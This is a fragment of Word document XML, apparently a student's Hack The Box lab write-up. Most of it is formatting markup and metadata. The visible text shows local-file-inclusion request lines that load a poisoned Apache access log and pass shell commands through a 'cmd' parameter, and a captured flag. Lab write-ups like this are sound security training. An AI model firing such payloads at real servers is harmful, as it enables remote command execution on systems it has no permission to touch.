      <w:r w:rsidRPr="0064445A">
        <w:t>/index.php?language=/var/log/apache2/access.log&amp;cmd=ls+-l+/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341AFBD8" w14:textId="33F842B7" w:rsidR="0064445A" w:rsidRDefault="0064445A" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A50C30" w14:textId="5C0E98B3" w:rsidR="0064445A" w:rsidRDefault="0064445A" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3704E2FE" wp14:editId="5964DB3D">
            <wp:extent cx="5943600" cy="1947545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="229858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84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554" w14:textId="15DF76AA" w:rsidR="00EA5AC3" w:rsidRDefault="00EA5AC3" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99C06D" w14:textId="34DEC88E" w:rsidR="00EA5AC3" w:rsidRDefault="00EA5AC3" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA5AC3">
        <w:t>/index.php?language=/var/log/apache2/access.log&amp;cmd=cat+/c85ee5082f4c723ace6c0796e3a3db09.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB72F60" w14:textId="7CCF6AD4" w:rsidR="00EA5AC3" w:rsidRDefault="00EA5AC3" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57895C8C" w14:textId="4782E299" w:rsidR="00EA5AC3" w:rsidRDefault="00EA5AC3" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033BE3E6" wp14:editId="3A28A5EC">
            <wp:extent cx="5943600" cy="1229995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1669808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82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AA94" w14:textId="3F23731B" w:rsidR="001328CB" w:rsidRDefault="001328CB" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="001328CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001328CB">
        <w:t>HTB{1095_5#0u1d_n3v3r_63_3xp053d}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00132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C64B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81867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861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912"/>
    <w:rsid w:val="00077482"/>
    <w:rsid w:val="000B168D"/>
    <w:rsid w:val="001328CB"/>
    <w:rsid w:val="001421D1"/>
    <w:rsid w:val="001B60D7"/>
    <w:rsid w:val="001F2340"/>
    <w:rsid w:val="00361685"/>
    <w:rsid w:val="003C1B1D"/>
    <w:rsid w:val="0041264E"/>
    <w:rsid w:val="004C0D90"/>
    <w:rsid w:val="004E46BB"/>
    <w:rsid w:val="00597F0D"/>
    <w:rsid w:val="00606436"/>
    <w:rsid w:val="00640838"/>
    <w:rsid w:val="0064445A"/>
    <w:rsid w:val="006D249B"/>
    <w:rsid w:val="006E739A"/>
    <w:rsid w:val="00734B0E"/>
    <w:rsid w:val="00810ABB"/>
    <w:rsid w:val="00866ACF"/>
    <w:rsid w:val="009677D0"/>
    <w:rsid w:val="009F0B04"/>
    <w:rsid w:val="00B54E4C"/>
    <w:rsid w:val="00BD5507"/>
    <w:rsid w:val="00BF6D7B"/>
    <w:rsid w:val="00C33038"/>
    <w:rsid w:val="00C60912"/>
    <w:rsid w:val="00C954DE"/>
    <w:rsid w:val="00DA433C"/>
    <w:rsid w:val="00EA5AC3"/>
    <w:rsid w:val="00EB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305CE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6AEEE74B-F38B-478D-BAFC-96C78111F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9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9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9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9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9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9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9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9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9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9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09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9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9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9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9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9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9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9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09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09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9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09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09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09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09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09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9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09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09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9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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-02T07:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-05T03:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>